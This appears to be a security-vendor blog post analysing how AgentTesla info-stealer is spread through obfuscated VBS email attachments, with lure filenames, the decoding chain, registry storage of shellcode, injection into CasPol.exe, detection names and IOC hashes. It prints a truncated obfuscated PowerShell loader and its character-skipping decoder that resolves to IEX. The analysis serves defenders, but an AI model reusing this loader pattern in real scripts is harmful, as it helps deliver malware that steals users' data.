The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla has been found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing.
The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified.
Distributed emailThe compressed file contains the VBS, and commonly used filenames include invoices and proposals. The confirmed filenames are as follows:
| Date | Filename |
| 10/05 | doc_10049500220529464169750.pdf.vbs |
| 10/07 | doc_5246701207754814333490.vbs |
| 10/12 | № 106 – Supply of Flex.vbs protected copy of the commercial invoice.vbs |
| 10/12 | LJUR900225565_pdf.vbs |
| 10/13 | 770140578183.CL.NoticeOfArrival.vbs |
| 10/15 | Urgent RFQ No.6554342.vbs |
| 10/17 | JKTR002014953_5101075053_ppwk.vbs |
| 10/17 | Order List(Draft) 9419-PDF.vbs |
| 10/18 | BESOLO.vbs |
| 10/21 | BEST SOLU.vbs |
The confirmed VBS files contain multiple annotations and dummy codes.
Confirmed VBS fileAside from the multiple annotations and dummy codes, there is a code at the bottom responsible for reading the strings in the currently running VBS file excluding every 2 characters
Code inside the VBSWhen this code is executed, the strings that were in the annotations are decoded and a new script code is executed. The decoded code includes an obfuscated shellcode and an additional PowerShell command.
Decoded VBS codeWhen the above script code is executed, the value of ‘Ch8’, an obfuscated shellcode, is saved to HKCU\Software\Basilicae17\Vegetates.
Value saved to the registryAfterward, the value of the ‘O9’ variable is executed through PowerShell. The ‘O9’ variable contains a PowerShell command, and the executed command is obfuscated as shown below.
| powershell.exe “$Quegh = “””DatFMaruBidnMescFultkariStaoPtenKol EftHStaTBesBCel Uer{Taw fem Las Ude UndpLawaDokrSlaaQuamAsi(Uhj[DagSBontUnbrSkaiTilnHalgTis]Fes`$LivHPerSWir)Con;Fat Ret Hjl Amp Aft`$IntBLavySaltfaseBinsEno Che=Sax CenNDvdeDoswCyp-VovOShab <ommited> Ind5Nin3Ree#Apo;”””;; Function Tammy159 { param([String]$HS); For($i=3; $i -lt $HS.Length-1; $i+=(3+1)){ $Statice = $Statice + $HS.Substring($i, 1); } $Statice;} $Ambulancetjeneste1820 = Tammy159 ‘UnsIPujEFolXInt ‘; $Ambulancetjeneste1821= Tammy159 $Quegh; & ($Ambulancetjeneste1820) $Ambulancetjeneste1821;; |
The PowerShell code decodes the obfuscated value saved on the ‘$Quegh’ variable by excluding every 3 characters. (ex. UnsIPujEFolXInt -> IEX)
The decoded command is also obfuscated, and the code that is ultimately executed is as follows.
The PowerShell command that is executed ultimatelyThe obfuscated shellcode that was saved before in HKCU\Software\Basilicae17\Vegetates is decoded in base64 and executed. The executed shellcode injects the AgentTesla malware into CasPol.exe, a normal process. AgentTesla is an info-stealer that collects user PC information, compresses it into CO_[username]/[PC name].zip and leaks it via email.
The email information used is as follows.
- From : [email protected]
- To : [email protected]
- pw : Fb56****65fr
Leaked informationAgentTesla is malware that is also prevalent in weekly statistics, and its distribution method is continuously changing. Also, caution is advised because a variety of malware can be executed aside from AgentTesla according to the shellcode.
[File Detection]
Dropper/VBS.Generic
Downloader/VBS.Powershell
Trojan/VBS.Agent
Trojan/VBS.Obfuscated
[IOC]
7fe2ed92d9306c8f0843cbb4a38f88e0
b06081daa9bc002cd750efb65e1e932e
eccef74de61f20a212ecbb4ead636f73
ea202427fbe14d9a6d808b9ee911f68c
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post <strong>AgentTesla Being Distributed via VBS</strong> appeared first on ASEC BLOG.
Article Link: AgentTesla Being Distributed via VBS - ASEC BLOG